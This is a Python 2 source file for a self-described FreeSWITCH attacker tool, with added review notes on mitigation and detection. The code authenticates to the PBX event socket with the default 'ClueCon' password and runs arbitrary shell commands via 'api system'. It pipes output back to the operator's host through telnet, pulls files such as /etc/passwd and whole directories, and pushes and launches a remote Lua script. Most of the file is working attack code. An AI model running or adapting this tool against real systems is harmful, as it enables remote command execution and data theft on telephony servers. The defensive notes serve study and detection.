#!C:\Python25_32bit\python.exe
# (c) 2010 Adam Pridgen adam@praetoriangrp.com, adam.pridgen@thecoverofnight.com
# cmd_interface.py:
# FreeSWITCH attacker command interface. Provides a basic interface to a
# FreeSWITCH installation with a default password
#
#
# GPLv3 License
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Review notes (defensive context, derived from the code below):
#  - The only credential used is the FreeSWITCH event-socket default password
#    "ClueCon" on TCP 8021 (start_the_command_channel). A deployment that keeps
#    that default and exposes the port to untrusted networks is the precondition
#    for everything in this file. Mitigation: set a unique event-socket password,
#    restrict the listener with an inbound ACL / firewall, and keep it off
#    untrusted interfaces.
#  - Every action is an `api system <shell command>` sent over the event socket,
#    i.e. shell execution on the PBX host; results are piped back with
#    `telnet <myaddr> <iport>`. Unexpected outbound TCP connections from the
#    PBX host, and `system` api commands in the event-socket traffic, are the
#    observables a detection rule can key on.
#  - This is Python 2 code (print statement, xrange); the shebang points at a
#    Python 2.5 interpreter.

from socket import socket
from threading import Thread, Semaphore
import sys
from time import sleep
from binascii import unhexlify

host = "TARGET_HOST_HERE"    # FreeSWITCH host (placeholder)
myaddr = "YOUR_HOST_HERE"    # address the PBX host will connect back to
iport = 1225                 # local "sink" listener port for piped output
oport = 8021                 # FreeSWITCH event-socket port

DATA_LOCK = Semaphore(1)     # guards DATA between the main loop and the sink thread
DATA = ""                    # shared receive buffer (a byte str under Python 2)
ACCEPT = False               # sink thread keeps running while True
FILE_RECVD = True            # False while a file pull is waiting for data
LARGE_FILE_SCRIPT = "dd_remote.lua"      # local helper script (not part of this file)
LARGE_FILE_DST = "/opt/dd_remote.lua"    # where push_file writes it on the PBX host


def get_data():
    """Return the contents of the shared buffer and clear it.

    Holds DATA_LOCK for the read-and-reset so the sink thread cannot
    interleave an append between the two steps.
    """
    global DATA, DATA_LOCK
    DATA_LOCK.acquire()
    d = DATA
    DATA = ""
    DATA_LOCK.release()
    return d


def set_data(val=""):
    """Replace the shared buffer with *val* (default: empty) under DATA_LOCK."""
    global DATA, DATA_LOCK
    DATA_LOCK.acquire()
    DATA = val
    DATA_LOCK.release()


def append_data(val):
    """Append *val* to the shared buffer and return the new buffer contents."""
    global DATA, DATA_LOCK
    DATA_LOCK.acquire()
    DATA += val
    data = DATA
    DATA_LOCK.release()
    return data


def push_file(sock, sfilename, dfilename):
    """Write the local text file *sfilename* to *dfilename* on the PBX host.

    Each line is appended remotely with an `echo "<line>" >> <dfilename>`
    system command; double quotes are converted to single quotes first so the
    line does not terminate the echo argument, and lines longer than 1000
    characters are sent in 1000-character pieces. Output is not redirected,
    so nothing comes back on the sink channel.
    """
    echo_cmd = 'echo "%s" >> %s'
    sys.stdout.write("Copying %s to %s on the remote server\n"%(sfilename, dfilename))
    f = open(sfilename).readlines()
    preprocess = []
    for i in f:
        preprocess.append(i.replace('"', "'").strip())
    for i in preprocess:
        if len(i) > 1000:
            sys.stdout.write("Sending Lots of data!\n")
            r = [i[j:j+1000] for j in xrange(0, len(i), 1000)]
            data_sent = 0;
            for k in r:
                cmd = echo_cmd%(k, dfilename)
                send_raw_command(sock, cmd)
                data_sent += len(k)
                sys.stdout.write("Progress: Sent %d bytes for a total of %d\n"%(len(k), data_sent))
        else:
            cmd = echo_cmd%(i, dfilename)
            send_raw_command(sock, cmd)
    sys.stdout.write("Done sending the script to the remote file!\n")


def listen_for_data(in_):
    """Sink-thread body: accept connections on *in_* and collect what they send.

    Each accepted connection is drained by read_all and appended to the shared
    buffer. While a file pull is pending (FILE_RECVD is False) the first
    completed connection marks the pull finished and only the byte count is
    printed; otherwise the accumulated buffer is echoed to stdout.
    Runs until ACCEPT is cleared; note that read_all blocks in accept(), so the
    loop only re-checks ACCEPT after another connection arrives.
    """
    global ACCEPT, FILE_RECVD
    ACCEPT = True
    while ACCEPT:
        d = read_all(in_)
        t = append_data(d)
        if FILE_RECVD == False:
            FILE_RECVD = True
            sys.stdout.write("Recieved %u bytes of data."%(len(d)))
        else:
            sys.stdout.write(t)


def read_all(in_):
    """Accept one connection on the listening socket *in_* and read until EOF.

    Returns everything received as one str. The accepted socket is not closed
    here; it is dropped when the function returns.
    """
    sock,a = in_.accept()
    temp = None
    data = ''
    while temp != '':
        temp = sock.recv(1024)
        if temp == '':
            break
        data += temp
    return data


def start_the_command_channel(host, port):
    """Connect to the FreeSWITCH event socket and authenticate.

    Sends `auth ClueCon` — the factory-default event-socket password — and
    returns the connected socket. Event-socket commands are terminated by a
    blank line, hence the '\\x0a\\x0a'. The auth reply is never read.
    """
    free_switch_creds = "auth ClueCon"
    s = socket()
    s.connect((host, port))
    s.send(free_switch_creds+'\x0a\x0a')
    return s


def send_raw_command(sock, cmd):
    """Run *cmd* as a shell command on the PBX host via `api system`.

    Clears the shared buffer first. Output is not redirected anywhere, so
    the caller sees nothing unless *cmd* itself sends data back.
    """
    set_data()
    _cmd = 'api system %s \x0a\x0a'%(cmd)
    sock.send(_cmd)


def send_command(sock, cmd, host, iport=23):
    """First definition — shadowed by the identical-behaviour one below.

    Kept as in the original; the second `def send_command` is the one that
    is bound at import time.
    """
    set_data()
    _cmd = 'api system %s 2>&1| telnet %s %d\x0a\x0a'%(cmd,host, iport)
    set_data()
    sock.send(_cmd)


def send_command(sock, cmd, host, iport=23):
    """Run *cmd* on the PBX host and pipe stdout+stderr to host:iport.

    The remote side executes `<cmd> 2>&1 | telnet <host> <iport>`, so the
    result arrives on the sink listener (see listen_for_data) rather than on
    the event socket. Clears the shared buffer before sending.
    """
    set_data()
    _cmd = 'api system %s 2>&1| telnet %s %d\x0a\x0a'%(cmd,host, iport)
    sock.send(_cmd)


def start_the_sink_channel(host, port):
    """Create a TCP listener on (host, port) with a backlog of 5 and return it."""
    s = socket()
    s.bind((host, port))
    s.listen(5)
    return s


def get_file(sock, sfile, dfile, myaddr, iport):
    """Fetch the remote file *sfile* (via `cat`) and save it locally as *dfile*.

    Marks a pull pending, polls once a second until the sink thread flips
    FILE_RECVD, then writes whatever is in the shared buffer. The bare
    `except` reports any failure; note that sys.exc_info()[0] is an exception
    class, not a str, so the second write is unlikely to print as intended.
    """
    global FILE_RECVD
    user_cmd = "cat %s "%(sfile)
    FILE_RECVD = False
    set_data()
    send_command(sock, user_cmd, myaddr, iport)
    while not FILE_RECVD:
        sleep(1)
    try:
        f = open(dfile, 'wb')
        f.write(get_data())
        f.close()
        sys.stdout.write("Successfully wrote: %s"%dfile)
    except:
        sys.stdout.write("Ooops! something went wrong and the file was not written.")
        sys.stdout.write(sys.exc_info()[0])


def get_dir(sock, sdir, dfile, myaddr, iport):
    """Fetch the remote directory *sdir* as a tar stream and save it as *dfile*.

    Same pending/poll/write flow as get_file; only the remote command string
    differs (a `tar -czf` invocation writing to stdout).
    """
    global FILE_RECVD
    user_cmd = "tar -czf --recursion - %s"%(sdir)
    FILE_RECVD = False
    set_data()
    send_command(sock, user_cmd, myaddr, iport)
    while not FILE_RECVD:
        sleep(1)
    try:
        f = open(dfile, 'wb')
        f.write(get_data())
        f.close()
        sys.stdout.write("Successfully wrote: %s"%dfile)
    except:
        sys.stdout.write("Ooops! something went wrong and the file was not written.")
        sys.stdout.write(sys.exc_info()[0])


def rcmd_write(sock, rcmd, dfile):
    """Send a raw command and save whatever reaches the sink channel to *dfile*.

    Unlike get_file this uses send_raw_command, so the command itself must
    deliver its output to the sink listener; otherwise FILE_RECVD never flips
    and the poll loop does not return.
    """
    global FILE_RECVD
    FILE_RECVD = False
    set_data()
    send_raw_command(sock, rcmd)
    while not FILE_RECVD:
        sleep(1)
    try:
        f = open(dfile, 'wb')
        f.write(get_data())
        f.close()
        sys.stdout.write("Successfully wrote: %s"%dfile)
    except:
        sys.stdout.write("Ooops! something went wrong and the file was not written.")
        sys.stdout.write(sys.exc_info()[0])


def pull_hex_file(sock, sfile, dfile, myaddr, iport):
    """Fetch a remote file whose content is hex text and write it decoded.

    Same flow as get_file, with binascii.unhexlify applied to the received
    buffer before writing; a buffer that is not valid hex raises inside the
    try and is reported by the bare except.
    """
    global FILE_RECVD
    FILE_RECVD = False
    set_data()
    user_cmd = "cat %s "%(sfile)
    send_command(sock, user_cmd, myaddr, iport)
    while not FILE_RECVD:
        sleep(1)
    try:
        d = unhexlify(get_data())
        f = open(dfile, 'wb')
        f.write(d)
        f.close()
        sys.stdout.write("Successfully wrote: %s"%dfile)
    except:
        sys.stdout.write("Ooops! something went wrong and the file was not written.")
        sys.stdout.write(sys.exc_info()[0])


def get_large_file(sock, sfile, tfile, fsize, host, port, end):
    """Install LARGE_FILE_SCRIPT on the PBX host and start it in the background.

    Steps, in order: remove any previous copy at LARGE_FILE_DST, push the
    local script with push_file, `chmod a+x` it, then run it detached (`&`)
    with the positional arguments (sfile, tfile, fsize, host, port, end).
    What the script does with them is defined in dd_remote.lua, which is not
    part of this file. Nothing is collected here; the caller is told to watch
    the destination.
    """
    global FILE_RECVD, LARGE_FILE_SCRIPT, LARGE_FILE_DST, iport, myaddr
    sys.stdout.write("Removing %s from the remote system.\n"%(LARGE_FILE_DST))
    send_command(sock,"rm %s"%(LARGE_FILE_DST), myaddr, iport)
    sleep(1)
    push_file(sock, LARGE_FILE_SCRIPT, LARGE_FILE_DST)
    send_command(sock,"chmod a+x %s"%(LARGE_FILE_DST), myaddr, iport)
    user_cmd = "%s %s %s %s %s %d %s &"%(LARGE_FILE_DST, sfile, tfile, fsize, host, int(port), end)
    FILE_RECVD = False
    set_data()
    sys.stdout.write("Sending the following command:\n%s\n"%(user_cmd))
    send_raw_command(sock, user_cmd)
    sys.stdout.write("Monitor the destination of the image for action.\n")


# Interactive menu. NOTE: a non-raw literal; the Windows paths with "\U" are
# accepted by Python 2 but would be a SyntaxError under Python 3. The line
# breaks below are a reconstruction (the original layout was lost in transit).
CMD_MENU = """Enter a command:
1) (C) execute a command e.g. C ls -all
2) (F) pull down a file e.g. F /etc/passwd C:\Users\you\passwd
3) (D) pull down a tgz compressed directory e.g. D /etc/ C:\Users\you\etc.tgz
4) (R) enter a raw command e.g. system ls -all | telnet 192.168.35.14 1224
5) (W) enter a raw command e.g. system ls -all | telnet 192.168.35.14 1224
6) (L) push lua file to the host
7) (P) pull down hexadecimal file,, convert to binary
8) (G) pull back a dd image. src_file tempfile filesz tailvalue host port
8) (*) reset the connection
8) (Q) quit
"""

# Module-level side effects: importing this file connects to the event socket,
# binds the sink listener on all interfaces, and starts the sink thread.
out_ = start_the_command_channel(host, oport)
in_ = start_the_sink_channel("", iport)
t = Thread(target=listen_for_data, args=(in_,))
t.start()

if __name__ == "__main__":
    sys.stdout.write(CMD_MENU)
    while True:
        try:
            sys.stdout.write(">>>")
            cmd = sys.stdin.readline().strip()
            cmd_list = cmd.split()
            if cmd== "" :
                sys.stdout.write("Incorrect command!\n\n\n")
                continue
            elif cmd_list[0].upper() == "Q":
                #in_.shutdown(0)
                in_.close()
                ACCEPT = False
                break
            elif cmd_list[0].upper() == "*":
                out_ = start_the_command_channel(host, oport)
                sys.stdout.write("Connection reset and restablisehd")
                continue
            elif cmd_list[0].upper() == "M":
                sys.stdout.write(CMD_MENU)
                continue
            elif len(cmd_list) < 2:
                sys.stdout.write("Incorrect command!\n\n\n")
                sys.stdout.write(CMD_MENU)
                continue
            if cmd_list[0].upper() == "C":
                send_command(out_, " ".join(cmd_list[1:]), myaddr, iport)
                sleep(1)
            elif cmd_list[0].upper() == "R":
                send_raw_command(out_, " ".join(cmd_list[1:]))
                sleep(1)
            elif cmd_list[0].upper() == "F" and len(cmd_list) == 3:
                filename = cmd_list[1]
                saveas = cmd_list[2]
                get_file(out_, filename, saveas, myaddr, iport)
            elif cmd_list[0].upper() == "D" and len(cmd_list) == 3:
                filename = cmd_list[1]
                saveas = cmd_list[2]
                get_dir(out_, filename, saveas, myaddr, iport)
            elif cmd_list[0].upper() == "W" and len(cmd_list) > 2 :
                raw_cmd = " ".join(cmd_list[2:])
                saveas = cmd_list[1]
                rcmd_write(out_, raw_cmd, saveas)
            elif cmd_list[0].upper() == "L" and len(cmd_list) > 2 :
                sfilename = cmd_list[1]
                saveas = cmd_list[2]
                push_file(out_, sfilename, saveas)
            elif cmd_list[0].upper() == "P" and len(cmd_list) > 2 :
                sfilename = cmd_list[1]
                saveas = cmd_list[2]
                pull_hex_file(out_, sfilename, saveas, myaddr, iport)
            elif cmd_list[0].upper() == "G" and len(cmd_list) > 2 :
                sfilename = cmd_list[1]
                tempfile = cmd_list[2]
                filesz = cmd_list[3]
                tailvalue = cmd_list[4]
                # This assignment rebinds the module-level `host`, which the
                # "*" reconnect above uses afterwards.
                host = cmd_list[5]
                port = cmd_list[6]
                get_large_file(out_, sfilename, tempfile, filesz, host, port, tailvalue)
            else:
                sys.stdout.write("Incorrect command!\n\n\n")
                sys.stdout.write(CMD_MENU)
                continue
            sys.stdout.write("\n\n")
        except KeyboardInterrupt:
            ACCEPT = False
            #in_.shutdown(0)
            in_.close()
            break
    # The sink thread is not a daemon and may still be blocked in accept(),
    # which is why the user is told to close the window.
    print "Thanks for using the free switch 0wn3rz client...You need to close the window now"